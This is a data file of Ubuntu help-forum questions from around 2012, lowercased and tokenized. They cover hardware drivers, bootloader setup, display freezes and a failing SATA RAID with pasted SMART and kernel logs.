216377	my brother printer wo n't print but says it is receiving data ?	i recently installed ubuntu on my father 's computer and also installed his new brother printer . my first attempts with the printer i was able to install the drivers , but it would n't let me push the `` print test page '' button . i then went to this page install brother mfc295cn drivers to ubuntu and after following those instructions i was able to push the `` print test page '' button . the printer now says `` receiving data '' but then never prints the page . when i go to the printing queue it says that the job is completed . i am very new to ubuntu and not a programmer or anything so i am out of ideas on how to fix this . please help : )
216379	formatting a 3tb harddisk to ntfs	i 've just installed a new harddisk in my desktop for data storage , i want to format it with ntfs* . i first tried disk utility and gparted to format the volume , but using both i get : '' filesystem not clean '' and '' device is mounted and no online capability in fsck tool for file system '' how can i create a 3tb ntfs partition ? * i want it to be usable across multiple platforms in the future , so this seems sensible , but perhaps it is not the best choice ...
216383	ubuntu published os patch/package	i am very new to this community and ubuntu os . i am currently on a project to create a mirror repository server . however our patching policy is very restricted . before we add patch to the mirror server , we need to know details of the fix and we only allow to update specific patch . that way we only upgrade what we know and what we actually need to the client servers . please help me with questions below : where all os published patch/package are posted ? how do i control apt-mirror to update specific patch/package ?
216392	pygtk time date management in the loop	i am trying to build a shutdown snoozer for ubuntu , but i am still struggeling with python in general . pygtk is even based , and i do n't quite know how to do the time / date management because of this . does anyone have any resources for time or date or even calander management in pygtk . i need to be able to check todays date and compare it to what the user wants . any help would be appreaciated . here is the code behind the snoozer : import gettext from gettext import gettext as _ gettext.textdomain ( 'snooze ' ) from gi.repository import gtk # pylint : disable=e0611 import logging , time , datetime logger = logging.getlogger ( 'snooze ' ) import configparser , os # we need to be able to store and recal settings from snooze_lib import window from snooze.aboutsnoozedialog import aboutsnoozedialog from snooze.preferencessnoozedialog import preferencessnoozedialog # first try to read the config.cfg file config = configparser.rawconfigparser ( ) configfile = 'data/config.cfg' monstate = false tuestate = false wedstate = false thurstate = false fristate = false satstate = false sunstate = false # creating the config file def createconfigfile ( filename ) : print `` creating config '' config.add_section ( 'preferences ' ) config.set ( 'preferences ' , 'mon ' , false ) config.set ( 'preferences ' , 'tues ' , false ) config.set ( 'preferences ' , 'wed ' , false ) config.set ( 'preferences ' , 'thur ' , false ) config.set ( 'preferences ' , 'fri ' , false ) config.set ( 'preferences ' , 'sat ' , false ) config.set ( 'preferences ' , 'sun ' , false ) rewriteconfigfile ( filename ) # writing our configuration file to the failename as specifeid def rewriteconfigfile ( filename ) : with open ( filename , 'wb ' ) as configfile : config.write ( configfile ) # reading the config file def readconfigfile ( filename ) : print `` reading config '' global monstate , tuestate , wedstate , thurstate , fristate , satstate , sunstate monstate = config.getboolean ( 'preferences ' , 'mon ' ) tuestate = config.getboolean ( 'preferences ' , 'tues ' ) wedstate = config.getboolean ( 'preferences ' , 'wed ' ) thurstate = config.getboolean ( 'preferences ' , 'thur ' ) fristate = config.getboolean ( 'preferences ' , 'fri ' ) satstate = config.getboolean ( 'preferences ' , 'sat ' ) sunstate = config.getboolean ( 'preferences ' , 'sun ' ) # if the config does not exist , create it then read it . otherwise read it if not config.read ( configfile ) : createconfigfile ( configfile ) readconfigfile ( configfile ) else : readconfigfile ( configfile ) # see snooze_lib.window.py for more details about how this class works class snoozewindow ( window ) : __gtype_name__ = `` snoozewindow '' def finish_initializing ( self , builder ) : # pylint : disable=e1002 `` '' '' set up the main window '' '' '' super ( snoozewindow , self ) .finish_initializing ( builder ) self.aboutdialog = aboutsnoozedialog self.preferencesdialog = preferencessnoozedialog # code for other initialization actions should be added here . self.daymon = self.builder.get_object ( `` daymon '' ) self.daytues = self.builder.get_object ( `` daytues '' ) self.daywed = self.builder.get_object ( `` daywed '' ) self.daythur = self.builder.get_object ( `` daythur '' ) self.dayfri = self.builder.get_object ( `` dayfri '' ) self.daysat = self.builder.get_object ( `` daysat '' ) self.daysun = self.builder.get_object ( `` daysun '' ) self.statusbar = self.builder.get_object ( `` statusbar '' ) self.count = 0 # set the values based on the config file if monstate == true : self.daymon.activate ( ) if tuestate == true : self.daytues.activate ( ) if wedstate == true : self.daywed.activate ( ) if thurstate == true : self.daythur.activate ( ) if fristate == true : self.dayfri.activate ( ) if satstate == true : self.daysat.activate ( ) if sunstate == true : self.daysun.activate ( ) self.daymon.connect ( 'notify : :active ' , self.toggle_day , `` mon '' ) self.daytues.connect ( 'notify : :active ' , self.toggle_day , `` tues '' ) self.daywed.connect ( 'notify : :active ' , self.toggle_day , `` wed '' ) self.daythur.connect ( 'notify : :active ' , self.toggle_day , `` thur '' ) self.dayfri.connect ( 'notify : :active ' , self.toggle_day , `` fri '' ) self.daysat.connect ( 'notify : :active ' , self.toggle_day , `` sat '' ) self.daysun.connect ( 'notify : :active ' , self.toggle_day , `` sun '' ) # toggle the setting and store the information in the config file def toggle_day ( self , widget , active , day ) : state = widget.get_active ( ) # set the config option and update the config file global configfile config.set ( 'preferences ' , day , state ) rewriteconfigfile ( configfile ) self.statusbar.set_text ( `` saved config '' )
216396	how do i install pdfedit ?	online it says i should be able to find pdfedit in the software center . that does n't work for me . i 've tried many times . is there any other way to install pdfedit or master pdf edit on ubuntu 12.10 .
216398	set `` older '' kernel as default grub entry	i installed a mainline kernel for testing purposes . i would like to set grub to boot from the older kernel by default . i know i can set the grub_default=0 setting for the first page of grub but how do i set it to boot by default from one kernel in the second page ( advanced page ) ? i would prefer doing this without installing other software ( ex . grub-customizer ) .
216401	ubuntu 12.04 wpa key length only 63 characters	if i choose personal wpa my ubuntu 12.04 wifi gui apparently accepts a maximum of 63 characters only instead of the standard 64 , which makes it impossible to connect to 64 character protected nets , while enterprise pwa gui shows no such limitation - what can i do ? thanks roberto maybe my question was not so clearly formulated as i hoped . what i mean is when i want to connect to a specific wifi net from opensuse i am given a 64 character field tagged `` password '' where i can type the 64 hex digit string - 0 to 9 and a to f - that i got from the administrator and i get connected . when i try to connect from ubuntu i only get a field 63 character long to type in . the string last digit is truncated and i ca n't get connected .
216403	problem with task switcher and ccsm	i 'm trying to make a simpler task switcher work , instead of the default with unity . i installed ccsm , and then the extras to be able to access to static application switcher . the problem right now is that i can enable static application switcher but only if i run ccsm as sudo . when i try to enable running ccsm without sudo it does n't let me enable anything . all the checkboxes are disabled . and enabling as sudo does n't make the task switcher work . does anyone know how to make this work ?
216405	new lvm install to pick up existing home drive and reinstate swap partition	i 've read so many variables on what i 'm trying to do , i thought it better to ask outright . i 've been through a few installs and upgrades of ubuntu but never had my system ( root ) drive encrypted . just found out about lvm and installed a fresh 12.4 alternate without touching my old and seperate /home folder ( encrypted i 'm sure , although accessible now with root privileges ) on another ssd . i encrypted the ( new ) /home during install . i am looking to combine the two /home folders and set up existing swap partition that lies on the old /home drive ( as i removed the standard swap during install due to a lack of space on the root drive ) . can i do both actions with the lvm program ?
216407	can not connect wireless internet with 12.10 on dell inspiron 1525	i have just installed ubuntu 12.10 on my dell inspiron 1525 laptop . wired network connection works a treat but there is no option to enable wireless networking . nor can i use edit connections to add a wireless network connection . after entering details , the save button is disabled .
216415	ca n't boot ubuntu 12.10 with ati hd6450g	i 'm having problems booting the new ubuntu in my laptop , it stucks on the loading screen . i think may be my graphic card ( an ati hd6450g ) . i ca n't find the alternate installation , someone can help me ? i 'm trying to boot from an usb flash memory to do a clean install .
216419	how do i get the realtek rt8139 ethernet port working on a dell inspiron n5010 ?	i have recently installed ubuntu 12.10 onto my dell inspiron n5010 and ive been all over many forums trying to figure out how i can get my ethernet cable to be recognized so i can set up a wired connection . my network card is the realtek rt8139 and from what ive gathered the ethernet port driver for it is installed . whenever i run ifconfig in the terminal it says that eth1 is up and running but no matter how i edit the connection i can not get it to work . if anyone can help it would be greatly appreciated !
216422	after upgrade to 12.04 wireless icon is missing and sound no longer works	i recently updated to 12.04 on my sony vaio vgn-n110g . i 've had ubuntu on this laptop since 10.04 and have n't had any real problems . so i restarted my computer today and none of the unity desktop background showed up only the desktop with the files on it . i brought up the terminal and entered in unity -replace and restarted it and it came back up fine except that i noticed that my panel only had mail , volume , date/time , and power icons no wireless or bluetooth . i tried a couple of approaches to try and get it working again i tried nm-applet -- sm-disable and it brought up a warning message , i 'm not very skilled in code even though i 've had ubuntu for four years but in the past versions it was n't too big a problem
216425	ubuntu installer mode options	during installation from a bootable usb , ubuntu installer does not present the option of `` installing alongside '' windows 7 , but only `` erase hd completely '' or `` do something else '' . i am concerned that this is an indication that if i go ahead with a manual partition of the disk , i may have problems dual booting into windows 7 - grub may not recognize w7 os .
216427	setting up saned with sane-test	i 'm trying to setup a network service for running saned ( running the sane-test backend ) on ubuntu 12.10 , running it on a virtualbox . i followed the directions found here and i got to the point where if i use a front-end like xsane , or use the command scanimage -d test i get the desired behaviour . ( i get the test image ) . but when i try to use the network demon to access the backend ( from the localhost ) i get failed to connect . i used telnet on 127.0.0.1 6566 and i got the following error : saned : symbol lookup error : saned : undefined symbol : sanei_w_init i 'm a linux newbie , so i could be making some stupid mistake . any ideas on how to fix this ? [ update ] after posting this question i logged out , logged back in and it worked . after a few days i tried again and it gave the same error as before . any help ?
216429	gnome-shell partially freezes	this is not happening all the time , but only sometimes , totally random . when i 'm in the middle of some work something totally weird happens . keyboard suddenly stops working . i ca n't type , no matter which key i press nothing happens . i ca n't press alt + tab , i ca n't press alt + f4 , alt + f2 ... nothing . activities button is dead . also right click does not work , and something even more annoying , i can click on the 'menu ' in the top right corner ( the menu pops up ) , but clicking on 'power-off ' or 'suspend ' option does n't do anything . the only little thing i can do is : close the lid of my laptop so it goes to sleep . than wake it up again . and than it 's ok. everything works . so i guess restarting ( or refreshing ) gnome-shell fixes the problem . my specs : ubuntu 12.04.1 lts , gnome3 , dell studio laptop
216431	ca n't play midi file , gstreamer keeps asking for i386 plugin that ca n't be installed ( 64bit )	i use ubuntu 12.04 lts 64bit . when trying to play midi ( .mid ) file , it asks for a gstreamer plugin , but the install button itself is unclickable . actually , i have gstreamer0.10-plugins-bad ( gstreamer plugins for mms , wavpack , quicktime , musepack -- without the ( i386 ) at the end ) installed already . how do we solve this ? thanks in advance .
216435	terminal echo issue	i 've been using ubuntu 10.04 lts for a while , am quite new , using the terminal , made a script to open a project of mine containing multiple files with gedit - after execution of the respective script : gedit [ filename1 ] [ filename2 ] ... the terminal executes it successfully , gedit opens passed files and terminal is ready for another line . well , today i came across a strange issue - after the execution of the above mentioned script , gedit initiates successfully , but terminal denies execution of commands and echoes all keyboard events , even specific ctrl + ... functions - all until gedit is closed . i ca n't figure what caused this as my recent activity was focused around a c project , not regarding the terminal in any way . i recall being able to execute another line after initiating e.g . open gedit and compile a project within a single tab and session of a terminal window . any help would be appreciated ! regards !
216439	isight camera on quantal is erratic ( macbook air 4,2 )	i have a macbook air 4,2 ( 13 '' - 2011 ) . the isight camera has become rather erratic in quantal . if i just pull up something like skype and go into the settings , things look fine . the problem occurs when i am in an actual network video chat . the other party sees me skipping , lagging , still video for 30 seconds at a time , etc . audio works without flaw during those times . also , in os x in the same applications ( skype and google plus ) , on the same network , things appear just fine . i do n't have hard evidence , but iirc , this problem did not occur in precise . i know that my video chat has worked in the past , and i believe that the quantal upgrade was the dividing line . is there some problem with the driver for the isight camera ? some kind of settings that i am missing ? thanks !
216443	how do i debug xorg/fglrx related system freezes on ubuntu 12.10 ?	my brand new system is randomly freezing and i do n't know how to debug the issue . system : amd a10-5800k asus f2a85-m motherboard integrated radeon hd 7660d 8gb samsung ddr3 1600 ubuntu 12.10 gnome shell / unity ( issue exists in both ) xorg.conf ( relevant parts ) : section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:0:1:0 '' option `` texturedvideosync '' `` on '' option `` usefasttls '' `` 2 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` monitor0 '' defaultdepth 24 option `` useedid '' `` false '' option `` exactmodetimingsdvi '' `` true '' option `` nobandwidthtest '' `` true '' option `` modevalidation '' `` allownon60hzmodesdfpmodes , noediddfpmaxsizecheck , novertrefreshcheck , nohorizsynccheck , nodfpnativeresolutioncheck , nomaxsizecheck , nomaxpclkcheck , noedidmodes '' option `` useediddpi '' `` false '' option `` useedidfreqs '' `` 0 '' option `` nologo '' `` true '' option `` coolbits '' `` 1 '' option `` metamodes '' `` dfp-0 : 2560x1440_60 +0+0 '' subsection `` display '' depth 24 modes `` 2560x1440 '' endsubsection i ran memtest on my ram and it checks out fine . i have tried using the latest fglrx and fglrx-beta . i have loaded 3.6.x kernel . i do not see anything relevant in dmesg , kern.log , syslog , .xsession-errors or xorg.log . i can not ssh into the machine when frozen from another machine . i know that system resources not being stressed when the crashes happen . it seems that video and any gaming ( very simple graphics games ) contribute to the freezes most frequently . however , i have experienced the crash before when just using chrome . i suspect the crashes are xorg/fglrx related , but i have no evidence to back that up . where should i look ? what should i grep for ? what should i try next ?
216446	ubuntu install says no space but i have 90gb	installing latest ubuntu from usb pen drive , the 'try me ' ubuntu boots fine , but when i try to install there is very limited space . ( just 1.5 mb ) but when i boot windows the windows c drive says it has 90gb of free space .
216452	must go through windows boot loader to get to grub	i just installed a fresh copy of precise alongside windows 7 . i have to separate 750gb hard drives ; /dev/sda holds the windows partitions and /dev/sdb holds the ubuntu partitions . other than that , these are fresh installs of both windows 7 and ubuntu 12.04 . whenever i boot , grub does n't load , instead it goes to a black screen with a single blinking ( horizontal bar ) cursor in the top right corner . however , if i boot , hit escape right as the bios/post screen finishes up , see the windows boot loader and hit escape to make it go back to the bios screen . after the bios screen , grub shows up and everything functions normally ; i can boot into ubuntu or win7 . i do n't want to have to do the escape , escape , wait , boot trick every time . i have no idea what would be wrong or what information i could give you guys to help diagnose . i have run a sudo update-grub and it found everything normally . i tried adding nomodeset flag in the /etc/default/grub line grub_cmdline_linux_default which searching around made me think might work . thoughts on what i could do to fix this ? edit : i 've tried changing the boot order so that both drives in the bios ( both are labeled as `` internal hdd '' ) have had a try booting first . i think the problem may be that every time i boot , the bios boot order is different ... and i have to reset it . it seems to not be stable ... but i 'm not sure how to go about fixing that either . the machine has both traditional bios and uefi . it came standard in `` legacy '' mode ; so it is currently set to boot through legacy mode . i 've reinstalled ubuntu now , and now if i hit escape at the end of the bios/post startup screen , it takes me to grub menu . otherwise it automatically loads windows . it seems like grub is now the acting bootloader , it just does n't automatically start that unless i ask it to open a bootloader . in my other machines , it has always automatically started at the end of bios/post . edit2 : using gparted , i just looked at my partitions , it would seem that my linux-swap partition is currently flagged as the boot partition for my ubuntu install . i currently only have 2 partitions : one of `` ext4 '' with a mount point of `` / '' and flag `` `` ; and the `` linux-swap '' with mount point `` `` and flag `` boot . '' if i change the boot flag to be on `` / , '' it does not reliably solve the problem . after 10 boots : 2 booted successfully to grub 5 booted directly to windows 7 3 booted to the black screen with the cursor and hung there further research makes me think this is an issue of the bios not reliably booting hard drives in the same order or not finding both hard drives . if i ask it to create a `` boot menu '' sometimes it has 2 entries for `` internal hdd , '' sometimes 1 . also the list it creates changes order every time i bring it up ; so it is not following a consistent boot sequence . will report back if this is not an issue with grub . edit3 : after changing the 'boot flags ' about a bit , i have found a pattern . this machine actually has 3 hard drives , 2 sata 750gb ( 'sda ' and 'sdb ' ) and a 128gb ssd ( 'sdc ' ) . when i boot , i think it is loading from a different one of them each time in this order : 'sda ' ( windows loads with no boot loader ) , 'sdc ' ( black screen with cursor ) , then 'sdb ' ( grub loads and i can choose to load windows or ubuntu ) . i think the problem is trying to tell the bios to reliably choose a partition to boot from ; not in the way ubuntu installed .
216454	errors installing php5-mysql extension	getting error when installing php5-mysql . looks like a dpkg error . perhaps a broken package . have tried to fix the broken package . have reinstalled the lamp server and everything seems fine except being able to install the php5-mysql extension , i get : errors were encountered while processing : php5-mysql the sub-process for dpkg is returning an error code . any ideas appreciated .
216458	how can i use 12.10 's grub menu in 12.04 ?	i am using 12.04 and i want to have the new grub menu in 12.10 . how can i do that ? this is the new grub menu used in 12.10 :
216461	sata hard drives in wo n't format in raid / disappear sometimes	i am trying to setup a new computer with a software raid0 . i am running 32 bit ubuntu 12.04 . i have my os installed on a pata hard drive , and 4 sata 2tb hitachi drives to be raided . the motherboard is an asus m2n-l , which uses nforce 570 sli / nvidia mcp55 ( rev a3 ) for it 's on-board sata controller . im aware software raid may not be the best , but i have several other machines with this setup that work excellent for my purposes . i was able to successfully build and start the raid via the ubuntu gui disk utility , but it gave me an error , that the partition was offset would run very slow and suggested i should re-partiton . i did re-partition , but that simply resulted in more errors ... can not find device , or offset problems , eventually i came back around to the partitioning step and i was able to mount the drive despite the error message , but it was indeed slow . and continuously failed to capture dv video . ( the other raids like this in my office capture 8 streams at a time ) i have since swapped all 4 sata cables , swapped the ports used and swapped the motherboard itself ( i have 2 of this asus m2n-l ) . i have also swapped 1 of 4 2tb hard drives . ( i have 6 , will eventually have 8 in two 4 drive raid0 's in this box ) i have the bios updated to most recent . i have tried manually using mdadm to asseble and create a raid array , but they always fail to format a filesystem . the gui sometimes will let me try and mount , but it always came back with errors like , look in `` dmesg | tail '' . bad superblock ... i looked this up and i tried to `` repair '' from an alternate superblock , but that also failed . additionally through out this process i 've been checking back to the disk utility gui and found that occasionally 1 of the 4 drives will disappear , or one of them will loose smart data status . if i restart , all drives and all smart data return . ( boot shows all drives , all with smart ) in my mind all the observations point to a driver conflict with ubuntu , but i did n't find anyone else complaining of issues with my combination of hardware ? asus has `` linux drivers '' but none for any debian based liunx , i tried converting rpms and installing , but that either did n't work or had no effect ( is it the same driver already included with ubuntu ? ) any ideas whats to blame or how to fix it ? i 'll be happy to post any specific data , just ask , im not sure whats relevant at this point ... thanks in advance . -mark 1st edit : ok , attempting to re-create original error message that created a working raid , but was too slow . in order to do that , im trying to delete the partitions on each drive and i get this error : error erasing : helper exited with exit code 1 : in part_del_partition : device_file=/dev/sde , offset=17408 entering ms-dos parser ( offset=0 , size=2000398934016 ) msdos_magic found found partition type 0xee = > protective mbr for gpt exiting ms-dos parser entering efi gpt parser gpt magic found partition_entry_lba=2 num_entries=128 size_of_entry=128 leaving efi gpt parser efi gpt partition table detected got it got disk got partition - part- > type=0 committed to disk error calling fsync ( 2 ) on /dev/sde : input/output error can not scrub filesystem signatures at offset=17408 and size=2000398899712 attempting to delete another partition : error erasing : helper exited with exit code 1 : in part_del_partition : device_file=/dev/sdb , offset=17408 entering ms-dos parser ( offset=0 , size=2000398934016 ) msdos_magic found found partition type 0xee = > protective mbr for gpt exiting ms-dos parser entering efi gpt parser gpt magic found partition_entry_lba=2 num_entries=128 size_of_entry=128 read failed ( input/output error ) leaving efi gpt parser efi gpt partition table detected got it error : /dev/sdb : unrecognised disk label ped_disk_new ( ) failed right after this error i tried : $ sudo smartctl -a /dev/sdb smartctl 5.41 2011-06-09 r3365 [ i686-linux-3.2.0-32-generic-pae ] ( local build ) copyright ( c ) 2002-11 by bruce allen , http : //smartmontools.sourceforge.net vendor : /3:0:0:0 product : user capacity : 600,332,565,813,390,450 bytes [ 600 pb ] logical block size : 774843950 bytes scsimodepageoffset : response length too short , resp_len=47 offset=50 bd_len=46 > > terminate command early due to bad response to iec mode page a mandatory smart command failed : exiting . to continue , add one or more '-t permissive ' options . 1 of the 4 drives has now disappeared from my list in the disk utility gui , and 2 of the 3 remaining no longer show smart status , here is the only currently `` available '' smart report : $ sudo smartctl -a /dev/sdd smartctl 5.41 2011-06-09 r3365 [ i686-linux-3.2.0-32-generic-pae ] ( local build ) copyright ( c ) 2002-11 by bruce allen , http : //smartmontools.sourceforge.net === start of information section === model family : hitachi deskstar 7k3000 device model : hitachi hds723020bla642 serial number : < removed > lu wwn device id : 5 000cca 36ac60074 firmware version : mn6oa800 user capacity : 2,000,398,934,016 bytes [ 2.00 tb ] sector size : 512 bytes logical/physical device is : in smartctl database [ for details use : -p show ] ata version is : 8 ata standard is : ata-8-acs revision 4 local time is : tue nov 13 09:18:40 2012 cst smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x82 ) offline data collection activity was completed without error . auto offline data collection : enabled . self-test execution status : ( 0 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 19381 ) seconds . offline data collection capabilities : ( 0x5b ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . offline surface scan supported . self-test supported . no conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 1 ) minutes . extended self-test routine recommended polling time : ( 255 ) minutes . sct capabilities : ( 0x003d ) sct status supported . sct error recovery control supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x000b 100 100 016 pre-fail always - 0 2 throughput_performance 0x0005 135 135 054 pre-fail offline - 84 3 spin_up_time 0x0007 182 182 024 pre-fail always - 276 ( average 353 ) 4 start_stop_count 0x0012 100 100 000 old_age always - 27 5 reallocated_sector_ct 0x0033 100 100 005 pre-fail always - 0 7 seek_error_rate 0x000b 100 100 067 pre-fail always - 0 8 seek_time_performance 0x0005 135 135 020 pre-fail offline - 26 9 power_on_hours 0x0012 100 100 000 old_age always - 197 10 spin_retry_count 0x0013 100 100 060 pre-fail always - 0 12 power_cycle_count 0x0032 100 100 000 old_age always - 23 192 power-off_retract_count 0x0032 100 100 000 old_age always - 31 193 load_cycle_count 0x0012 100 100 000 old_age always - 31 194 temperature_celsius 0x0002 150 150 000 old_age always - 40 ( min/max 23/51 ) 196 reallocated_event_count 0x0032 100 100 000 old_age always - 0 197 current_pending_sector 0x0022 100 100 000 old_age always - 0 198 offline_uncorrectable 0x0008 100 100 000 old_age offline - 0 199 udma_crc_error_count 0x000a 168 168 000 old_age always - 2323 smart error log version : 1 ata error count : 2323 ( device log contains only the most recent five errors ) cr = command register [ hex ] fr = features register [ hex ] sc = sector count register [ hex ] sn = sector number register [ hex ] cl = cylinder low register [ hex ] ch = cylinder high register [ hex ] dh = device/head register [ hex ] dc = device command register [ hex ] er = error register [ hex ] st = status register [ hex ] powered_up_time is measured from power on , and printed as ddd+hh : mm : ss.sss where dd=days , hh=hours , mm=minutes , ss=sec , and sss=millisec . it `` wraps '' after 49.710 days . error 2323 occurred at disk power-on lifetime : 197 hours ( 8 days + 5 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 84 51 00 00 00 00 00 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 27 00 00 00 00 00 e0 08 18:47:11.304 read native max address ext ec 00 00 00 00 00 a0 08 18:47:11.296 identify device f5 00 00 01 00 00 e0 04 18:47:11.141 security freeze lock f5 00 00 01 00 00 e0 00 18:47:00.653 security freeze lock e3 00 00 01 00 00 a0 00 18:47:00.007 idle error 2322 occurred at disk power-on lifetime : 197 hours ( 8 days + 5 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 84 51 00 00 00 00 00 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 27 00 00 00 00 00 e0 08 18:42:41.701 read native max address ext ec 00 00 00 00 00 a0 08 18:42:41.693 identify device ef 03 46 00 00 00 a0 08 18:42:41.685 set features [ set transfer mode ] 27 00 00 00 00 00 e0 08 18:42:41.685 read native max address ext ec 00 00 00 00 00 a0 08 18:42:41.677 identify device error 2321 occurred at disk power-on lifetime : 182 hours ( 7 days + 14 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 84 51 00 00 00 00 00 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ec 00 00 00 00 00 a0 08 03:48:06.464 identify device ef 03 46 00 00 00 a0 08 03:48:06.464 set features [ set transfer mode ] 27 00 00 00 00 00 e0 08 03:48:06.464 read native max address ext ec 00 00 00 00 00 a0 08 03:48:06.456 identify device f5 00 00 01 00 00 e0 04 03:48:06.301 security freeze lock error 2320 occurred at disk power-on lifetime : 182 hours ( 7 days + 14 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 84 51 00 00 00 00 00 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 27 00 00 00 00 00 e0 08 03:48:06.464 read native max address ext ec 00 00 00 00 00 a0 08 03:48:06.456 identify device f5 00 00 01 00 00 e0 04 03:48:06.301 security freeze lock f5 00 00 01 00 00 e0 00 03:47:53.105 security freeze lock e3 00 00 01 00 00 a0 00 03:47:52.448 idle error 2319 occurred at disk power-on lifetime : 182 hours ( 7 days + 14 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 84 51 00 00 00 00 00 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 27 00 00 00 00 00 e0 08 03:46:21.429 read native max address ext ec 00 00 00 00 00 a0 08 03:46:21.421 identify device ef 03 46 00 00 00 a0 08 03:46:21.413 set features [ set transfer mode ] 27 00 00 00 00 00 e0 08 03:46:21.413 read native max address ext ec 00 00 00 00 00 a0 08 03:46:21.405 identify device smart self-test log structure revision number 1 no self-tests have been logged . [ to run self-tests , use : smartctl -t ] smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay . i 'll try and re-create that original error again ... but as you can see i 've seen many a error on this venture ! thanks again ! 2nd edit : i ca n't seem to get back to all empty hard drives in order to reproduce the original error ! 1 of the 4 drives refuses to delete ... from the disk utility gui error erasing : helper exited with exit code 1 : in part_del_partition : device_file=/dev/sdd , offset=17408 entering ms-dos parser ( offset=0 , size=2000398934016 ) msdos_magic found found partition type 0xee = > protective mbr for gpt exiting ms-dos parser entering efi gpt parser gpt magic found partition_entry_lba=2 num_entries=128 size_of_entry=128 leaving efi gpt parser efi gpt partition table detected got it got disk got partition - part- > type=0 committed to disk error calling fsync ( 2 ) on /dev/sdd : input/output error can not scrub filesystem signatures at offset=17408 and size=2000398899712 i also tried wiping the drive with dd $ sudo dd if=/dev/zero of=/dev/sdd bs=1m dd : writing `/dev/sdd ' : no space left on device 2009+0 records in 2008+0 records out 2106302464 bytes ( 2.1 gb ) copied , 1.73234 s , 1.2 gb/s seems odd that a 2tb drive is full after writing 1.2 gbs ? since i ca n't seem to erase this drive i ca n't re-create my original error message ... but something tells me that all these errors point to the same reason why i got an error in the first place.. if they point to anything at all . 3rd edit : dmesg output cropped due to askubuntu character limit , full text available on google drive https : //docs.google.com/document/d/158e_i2h86wbyzigeocoq7vbl3ccjyqqus6bc8afvcoi/edit [ 480.956838 ] ata5.00 : status : { drdy err } [ 480.956840 ] ata5.00 : error : { icrc abrt } [ 480.956842 ] ata5.00 : failed command : write fpdma queued [ 480.956847 ] ata5.00 : cmd 61/28:08:88:88 : e0/00:00 : e8:00:00/40 tag 1 ncq 20480 out [ 480.956848 ] res 51/84:08:00:08:00/84:00:00:00:00/40 emask 0x10 ( ata bus error ) [ 480.956850 ] ata5.00 : status : { drdy err } [ 480.956852 ] ata5.00 : error : { icrc abrt } [ 480.956856 ] ata5.00 : failed command : read fpdma queued [ 480.956861 ] ata5.00 : cmd 60/08:10:00:08:00/00:00:00:00:00/40 tag 2 ncq 4096 in [ 480.956862 ] res 51/84:08:00:08:00/84:00:00:00:00/40 emask 0x10 ( ata bus error ) [ 480.956864 ] ata5.00 : status : { drdy err } [ 480.956866 ] ata5.00 : error : { icrc abrt } [ 480.956870 ] ata5 : hard resetting link [ 480.956872 ] ata5 : nv : skipping hardreset on occupied port [ 481.424020 ] ata5 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 481.448420 ] ata5.00 : configured for udma/133 [ 481.448427 ] ata5 : eh complete [ 481.470607 ] ata5 : eh in swncq mode , qc : qc_active 0x7 sactive 0x7 [ 481.470610 ] ata5 : swncq : qc_active 0x6 defer_bits 0x1 last_issue_tag 0x2 [ 481.470611 ] dhfis 0x6 dmafis 0x2 sdbfis 0x1 [ 481.470613 ] ata5 : ata_reg 0x51 err_reg 0x84 [ 481.470615 ] ata5 : tag : dhfis dmafis sdbfis sactive [ 481.470617 ] ata5 : tag 0x1 : 1 1 0 1 [ 481.470619 ] ata5 : tag 0x2 : 1 0 0 1 [ 481.470625 ] ata5.00 : exception emask 0x1 sact 0x7 serr 0x400000 action 0x6 frozen [ 481.470627 ] ata5.00 : ata error . fis:0x21 [ 481.470629 ] ata5 : serror : { handshk } [ 481.470632 ] ata5.00 : failed command : read fpdma queued [ 481.470636 ] ata5.00 : cmd 60/08:00:00:01:00/00:00:00:00:00/40 tag 0 ncq 4096 in [ 481.470638 ] res 51/84:28:00:00:00/84:00:00:00:00/40 emask 0x10 ( ata bus error ) [ 481.470642 ] ata5.00 : status : { drdy err } [ 481.470644 ] ata5.00 : error : { icrc abrt } [ 481.470646 ] ata5.00 : failed command 